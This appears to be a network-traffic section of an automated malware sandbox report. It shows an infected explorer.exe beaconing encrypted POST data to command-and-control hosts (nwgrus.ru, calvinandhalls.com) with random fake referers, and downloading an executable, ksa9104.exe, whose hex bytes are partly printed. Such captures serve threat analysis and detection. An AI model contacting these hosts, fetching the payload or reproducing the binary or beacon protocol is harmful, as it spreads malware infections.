Oct 3, 2024 02:55:30.057107925 CEST	166	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 43 a7 80 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vu]CRy+%(kk`/x{bYS9c$X@Ub1L"m
Oct 3, 2024 02:55:31.392007113 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:55:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49798	201.212.52.197	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:55:47.915378094 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iqyabdaoinn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: nwgrus.ru
Oct 3, 2024 02:55:47.915433884 CEST	199	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 59 0f c8 ee Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuYr&raN2Q9<s6>dGxq4_7S&Q/2/WwJJ&vo5$XAKz
Oct 3, 2024 02:55:49.226342916 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:55:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49761	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:52:53 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-03 00:52:53 UTC	327	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:52:53 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Thu, 03 Oct 2024 00:45:02 GMT ETag: "3be00-62387dd635997" Accept-Ranges: bytes Content-Length: 245248 Connection: close Content-Type: application/x-msdos-program
2024-10-03 00:52:53 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a ba 69 7a 3e db 07 29 3e db 07 29 3e db 07 29 83 94 91 29 3f db 07 29 20 89 83 29 23 db 07 29 20 89 92 29 2d db 07 29 20 89 84 29 54 db 07 29 19 1d 7c 29 39 db 07 29 3e db 06 29 49 db 07 29 20 89 8d 29 3f db 07 29 20 89 93 29 3f db 07 29 20 89 96 29 3f db 07 29 52 69 63 68 3e db 07 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 11 aa 35 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ziz>)>)>))?) )#) )-) )T)\|)9)>)I) )?) )?) )?)Rich>)PEL5d
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: c5 ac e2 41 00 53 57 e8 2e 33 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 bc 14 00 00 83 c4 14 68 10 20 01 00 68 78 b7 41 00 57 e8 a1 31 00 00 83 c4 0c eb 32 6a f4 ff 15 58 b0 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac e2 41 00 ff 36 e8 2b 13 00 00 59 50 ff 36 53 ff 15 f0 b0 41 00 5f 5e 5b c9 c3 6a 03 e8 58 34 00 00 59 83 f8 01 74 15 6a 03 e8 4b 34 00 00 59 85 c0 75 1f 83 3d 04 e0 41 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 8b ff 55 8b ec 8b 45 08 a3 94 01 42 00 5d c3 8b ff 55 8b ec ff 35 94 01 42 00 e8 f5 0c 00 00 59 85 c0 74 0f ff 75 08 ff d0 59 85 c0 74 05 33 c0 40 5d c3 33 c0 5d c3 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 62 e6 ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 Data Ascii: ASW.3tVVVVVh hxAW12jXA;t$tjEP4A6+YP6SA_^[jX4YtjK4Yu=Auh)hYYUEB]U5BYtuYt3@]3]UVWuMbEu3;t0
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 83 c7 04 59 89 06 83 ff 28 72 e8 5f 5e c3 cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 8b 4d 08 b8 4d 5a 00 00 66 39 01 74 04 33 c0 5d c3 8b 41 3c 03 c1 81 38 50 45 00 00 75 ef 33 d2 b9 0b 01 00 00 66 39 48 18 0f 94 c2 8b c2 5d c3 cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 8b 45 08 8b 48 3c 03 c8 0f b7 41 14 53 56 0f b7 71 06 33 d2 57 8d 44 08 18 85 f6 76 1b 8b 7d 0c 8b 48 0c 3b f9 72 09 8b 58 08 03 d9 3b fb 72 0a 42 83 c0 28 3b d6 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 58 c6 41 00 68 d0 26 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 08 e0 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 2a ff ff ff 83 c4 04 85 c0 74 55 8b 45 08 2d 00 00 40 00 50 68 00 Data Ascii: Y(r_^UMMZf9t3]A<8PEu3f9H]UEH<ASVq3WDv}H;rX;rB(;r3_^[]UjhXAh&@dPSVWA1E3PEdeEh@*tUE-@Ph
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 09 83 c2 01 0f ab 04 24 eb f1 8b 75 08 83 c9 ff 8d 49 00 83 c1 01 8a 06 0a c0 74 09 83 c6 01 0f a3 04 24 73 ee 8b c1 83 c4 20 5e c9 c3 cc cc cc cc cc cc cc cc cc cc 8b 54 24 04 8b 4c 24 08 f7 c2 03 00 00 00 75 3c 8b 02 3a 01 75 2e 0a c0 74 26 3a 61 01 75 25 0a e4 74 1d c1 e8 10 3a 41 02 75 19 0a c0 74 11 3a 61 03 75 10 83 c1 04 83 c2 04 0a e4 75 d2 8b ff 33 c0 c3 90 1b c0 d1 e0 83 c0 01 c3 f7 c2 01 00 00 00 74 18 8a 02 83 c2 01 3a 01 75 e7 83 c1 01 0a c0 74 dc f7 c2 02 00 00 00 74 a4 66 8b 02 83 c2 02 3a 01 75 ce 0a c0 74 c6 3a 61 01 75 c5 0a e4 74 bd 83 c1 02 eb 88 cc cc cc cc cc cc cc cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 a4 01 00 00 81 f9 00 01 00 00 72 1f 83 3d 44 71 51 00 00 74 16 57 56 83 e7 0f 83 e6 Data Ascii: $uIt$s ^T$L$u<:u.t&:au%t:Aut:auu3t:uttf:ut:autUWVuM};v;r=DqQtWV
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 08 40 40 66 85 c9 75 f6 2b 45 08 d1 f8 48 5d c3 6a 10 68 18 c7 41 00 e8 db 9d ff ff 8b 5d 08 85 db 75 0e ff 75 0c e8 88 88 ff ff 59 e9 cc 01 00 00 8b 75 0c 85 f6 75 0c 53 e8 58 87 ff ff 59 e9 b7 01 00 00 83 3d 7c 72 51 00 03 0f 85 93 01 00 00 33 ff 89 7d e4 83 fe e0 0f 87 8a 01 00 00 6a 04 e8 97 92 ff ff 59 89 7d fc 53 e8 c0 92 ff ff 59 89 45 e0 3b c7 0f 84 9e 00 00 00 3b 35 6c 72 51 00 77 49 56 53 50 e8 a2 97 ff ff 83 c4 0c 85 c0 74 05 89 5d e4 eb 35 56 e8 71 9a ff ff 59 89 45 e4 3b c7 74 27 8b 43 fc 48 3b c6 72 02 8b c6 50 53 ff 75 e4 e8 cd e0 ff ff 53 e8 70 92 ff ff 89 45 e0 53 50 e8 96 92 ff ff 83 c4 18 39 7d e4 75 48 3b f7 75 06 33 f6 46 89 75 0c 83 c6 0f 83 e6 f0 89 75 0c 56 57 ff 35 24 fd 41 00 ff 15 b0 b0 41 00 89 45 e4 3b c7 74 20 8b 43 fc 48 3b Data Ascii: @@fu+EH]jhA]uuYuuSXY=\|rQ3}jY}SYE;;5lrQwIVSPt]5VqYE;t'CH;rPSuSpESP9}uH;u3FuuVW5$AAE;t CH;
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 08 75 11 50 e8 4a ff ff ff 59 83 f8 ff 74 1e ff 45 e4 eb 19 39 7d 08 75 14 f6 c1 02 74 0f 50 e8 2f ff ff ff 59 83 f8 ff 75 03 09 45 dc 89 7d fc e8 08 00 00 00 46 eb 84 33 ff 8b 75 e0 a1 2c 61 51 00 ff 34 b0 56 e8 d5 0a 00 00 59 59 c3 c7 45 fc fe ff ff ff e8 12 00 00 00 83 7d 08 01 8b 45 e4 74 03 8b 45 dc e8 91 7e ff ff c3 6a 01 e8 70 72 ff ff 59 c3 6a 01 e8 1f ff ff ff 59 c3 8b ff 55 8b ec b8 e4 1a 00 00 e8 1a ef ff ff a1 08 e0 41 00 33 c5 89 45 fc 8b 45 0c 56 33 f6 89 85 34 e5 ff ff 89 b5 38 e5 ff ff 89 b5 30 e5 ff ff 39 75 10 75 07 33 c0 e9 e9 06 00 00 3b c6 75 27 e8 17 71 ff ff 89 30 e8 fd 70 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 26 98 ff ff 83 c4 14 83 c8 ff e9 be 06 00 00 53 57 8b 7d 08 8b c7 c1 f8 05 8d 34 85 60 71 51 00 8b 06 83 e7 1f c1 e7 06 Data Ascii: uPJYtE9}utP/YuE}F3u,aQ4VYYE}EtE~jprYjYUA3EEV34809uu3;u'q0pVVVVV&SW}4`qQ
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: fe 5c cd e0 cf ea 19 74 f6 88 b1 91 69 de 10 61 d2 0a da 34 33 60 af b8 47 cc 54 96 02 85 bb 17 6d 7a f5 d9 85 6c 91 d8 74 b0 5d ed fd f1 22 df 0a 44 f0 c9 34 83 d0 21 e1 1f 6b 6f ab 11 61 b5 a8 90 d1 c5 ad 97 63 2e a6 97 4a ef c7 59 66 d8 a9 84 f8 52 ef 99 17 9d cb d7 7d 35 14 1b 78 f7 2a 2a 85 fa d4 57 06 df 80 d4 0c 46 73 67 d3 ec 3a f2 8e d4 c5 8c dc 2d 9c 70 52 95 e7 4d 86 a0 6f 4b 6b 43 aa 51 19 01 d7 9e 3c 24 58 7d 13 18 58 3e 06 e0 f0 df b3 09 69 23 d6 73 63 6a 40 86 e9 5e e5 f2 63 9a da 13 b4 92 6d 08 cf f6 8b 09 95 00 9c 57 0e ff 96 35 82 f6 fc 22 47 34 16 42 be c1 e6 97 02 e2 5f 85 40 66 a8 ce 4f e9 90 c0 10 20 b4 79 f3 9e 89 c9 10 3b d3 04 c7 7c 12 34 14 fe 8f 72 86 ac a7 a4 b0 ff 62 1f 8a 8e f6 23 58 5a 32 61 c0 23 38 dc a0 56 ef 61 ac 4a e6 Data Ascii: \tia43`GTmzlt]"D4!koac.JYfR}5x**WFsg:-pRMoKkCQ<$X}X>i#scj@^cmW5"G4B_@fO y;\|4rb#XZ2a#8VaJ
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: 3e ae 96 ef 4e f6 0f 4f bd 7f 71 5c 6e f3 ca d2 ef 3c 47 88 23 44 74 34 ba 13 01 4a 5f 2e c8 86 0a 0c 69 20 e8 46 d9 71 d0 69 90 a5 6f 1a 2c 4e d5 01 5b 10 dc 70 33 f5 2d b8 98 84 26 cf 7a 9e e6 c4 3a c1 53 0e 17 52 24 37 ac 7e ab d4 e6 6b ee 81 3d 05 99 68 09 3f f0 86 82 70 ee 8d 4a a4 2b 54 ee fa 2a fd 64 5c 53 8b 95 13 8e 82 34 0e 22 e4 5c eb 81 db 19 07 b5 55 84 7f 30 eb d1 29 38 d4 8b 30 26 6a 0f 41 c2 1c 83 e7 ea 55 a9 3c 5f b9 54 22 69 bf 8a c8 00 18 78 99 e8 cb 55 39 b8 3d a5 9e c9 09 b5 09 51 52 60 be 12 02 17 fb 5c d0 d4 b5 50 68 85 1e 23 e2 24 d0 c5 66 5a ae 3d 71 bb bb 68 39 ac 90 ff 5e 00 a8 59 18 31 55 56 be 67 85 57 11 e6 a4 0f 10 5b fc 52 54 53 bf f0 50 d1 c3 20 e3 1e 30 24 b0 4a bf fc 3f 89 65 0f b3 05 13 29 5c 69 fb 9f d8 d3 42 8a 15 74 Data Ascii: >NOq\n<G#Dt4J_.i Fqio,N[p3-&z:SR$7~k=h?pJ+T*d\S4"\U0)80&jAU<_T"ixU9=QR`\Ph#$fZ=qh9^Y1UVgW[RTSP 0$J?e)\iBt
2024-10-03 00:52:53 UTC	8000	IN	Data Raw: e2 a6 41 48 13 5d 95 56 6e b0 ae df 08 be c0 08 c2 e9 ea f1 df 2b e9 3a 6e d7 c4 a4 16 e0 af ca ee 62 5f 1e a4 40 01 bd 22 76 b3 ec c3 2d 2c 77 90 bf b7 84 bf 93 93 a6 0d b3 33 b7 a1 3a de cd 3b 66 94 07 72 54 13 d9 fa 2e a2 b4 c6 1f 61 f2 26 f4 df 95 27 9d 83 39 7a a9 6d b0 8b ea b7 e7 5f fb af 8f 8f d9 0d 0e ef f9 fe dc 84 09 d1 61 db bc ba 5f a5 94 5e 91 9f 86 11 63 32 75 e7 45 ec 5b 22 f1 2a 09 af 16 6a 9f 03 b0 f1 86 a0 b5 ed 14 b4 d8 7a 35 8d 4d 4c 16 f0 f4 39 35 39 57 61 17 b0 c6 02 7c d3 03 92 30 24 65 8b 7a 58 4a ca 57 68 8c 4d c7 07 e4 be 3a 64 14 eb 30 fa 8c 89 af f9 74 a1 44 1e 40 68 31 f0 72 8c a2 77 b9 aa 5b 1e 45 87 34 fc fc ac fe f9 54 bf 35 b0 24 3a 87 83 31 78 eb dc 93 be cb be bc 42 b9 b8 75 0f be 3f 28 6f 5f dd 6b cb 2c 5e 4d 9b 25 44 Data Ascii: AH]Vn+:nb_@"v-,w3:;frT.a&'9zm_a_^c2uE["*jz5ML959Wa\|0$ezXJWhM:d0tD@h1rw[E4T5$:1xBu?(o_k,^M%D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49768	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:17 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://chraqvgclyunxk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: calvinandhalls.com
2024-10-03 00:53:17 UTC	274	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 3a a5 6b eb d8 fc 1f 43 d3 3b 64 b8 4a d6 f2 7b 69 ea 0c 53 3e d0 a6 ef 39 fb d7 6e 58 c5 e4 60 9a 29 62 bf 98 56 13 5d 5e 59 4b 80 31 9b e2 c9 59 9f ad 76 2b 3c bf 52 46 d0 2b 50 d8 85 a6 92 0e 68 8d 5d e8 2a a9 1f 25 8e 47 89 43 23 7e 02 12 b4 f9 60 e1 a4 06 84 35 1f d6 fa a6 10 d8 b8 02 ed a9 f2 c0 2d 40 87 98 c7 4c 15 94 63 39 f0 0d 11 23 f1 38 2e 53 e7 34 6e 5b 94 a2 eb 11 77 d0 a1 33 ba 52 9e bb e7 19 07 62 70 fe 5f 2c 7a 56 74 d4 3a 8b 9f 76 50 79 31 4a 9d 95 50 3a 31 27 8f 81 c7 34 cc b2 01 9d 43 92 90 e3 99 7c db 7c Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLj4%<:kC;dJ{iS>9nX`)bV]^YK1Yv+<RF+Ph]*%GC#~`5-@Lc9#8.S4n[w3Rbp_,zVt:vPy1JP:1'4C\|\|
2024-10-03 00:53:17 UTC	294	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:53:17 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-10-03 00:53:17 UTC	7898	IN	Data Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 58 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa Data Ascii: 1ee6X[!`.{2Pr>iLn"DwQmZZKQ@@V44"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-10-03 00:53:17 UTC	18	IN	Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c Data Ascii: JMQF 82
2024-10-03 00:53:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 00:53:17 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f Data Ascii: 2000CCvH(= \| _ztb8PjV7+ytfq:2VHEt4T>=&2)_UmzKut\|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-10-03 00:53:17 UTC	6	IN	Data Raw: 97 20 09 6c 1a f8 Data Ascii: l
2024-10-03 00:53:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-10-03 00:53:17 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-10-03 00:53:17 UTC	6	IN	Data Raw: 60 4f 16 27 c7 be Data Ascii: `O'
2024-10-03 00:53:17 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49769	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:18 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://inghaccxrhcia.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: calvinandhalls.com
2024-10-03 00:53:18 UTC	327	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 35 f1 1c fe c1 c8 5c 46 a9 2a 35 ff 28 81 96 3e 1f c8 74 49 39 8b e3 f5 5e a4 c3 70 04 d8 e8 42 b8 2a 4c bf d1 06 04 23 16 39 23 e9 07 db 84 d8 5b fe 81 45 11 22 bc 0a 54 a0 42 54 fd e5 a7 a7 4a 01 92 42 a4 2a 80 05 7f 8e 30 ac 33 2a 6f 3d 45 a0 dc 66 e0 d5 22 c1 1e 3c db e7 a9 2e ac 9d 59 97 b5 aa 90 28 46 da b2 aa 1c 58 c0 65 33 fd 01 1a 09 a1 29 09 27 ee 17 17 3f 9d d1 d2 2a 33 89 ae 2c ef 34 94 d0 cb 29 09 19 55 f5 10 65 00 0f 1c ef 48 92 9d 78 32 29 51 55 d9 81 44 64 4e 2c 91 fa f0 1b d5 f9 32 f2 4d d0 b7 ca ad 07 93 6d Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lj4%<5\F5(>tI9^pBL#9#[E"TBTJB03o=Ef"<.Y(FXe3)'?*3,4)UeHx2)QUDdN,2Mm
2024-10-03 00:53:19 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:19 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49770	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:19 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://uwadsovjohptv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: calvinandhalls.com
2024-10-03 00:53:19 UTC	200	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 5d a9 21 eb dc ba 12 10 ae 75 26 a3 7a c9 ed 79 08 a9 7a 37 76 bf bf cf 75 e5 dc 0e 1f de 9b 26 81 6d 59 9a f8 1a 28 37 45 12 47 c5 08 de 89 9c 27 97 ea 61 07 48 fe 66 26 c5 4d 64 92 e3 80 da 23 66 c9 61 e9 44 ef 62 4c 95 2d 8e 2c 6f 61 66 04 c0 d0 5f f0 99 00 8a 42 1e 8d da dc 09 be 85 7d f2 8b ab df 27 36 d2 ae 8c 61 43 a0 5f 5c e0 2c 0c 0a a7 4b 74 78 ca 53 5d Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lk4%<]!u&zyz7vu&mY(7EG'aHf&Md#faDbL-,oaf_B}'6aC_\,KtxS]
2024-10-03 00:53:20 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:19 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49771	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:20 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://dqjcshdhfiffhik.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: calvinandhalls.com
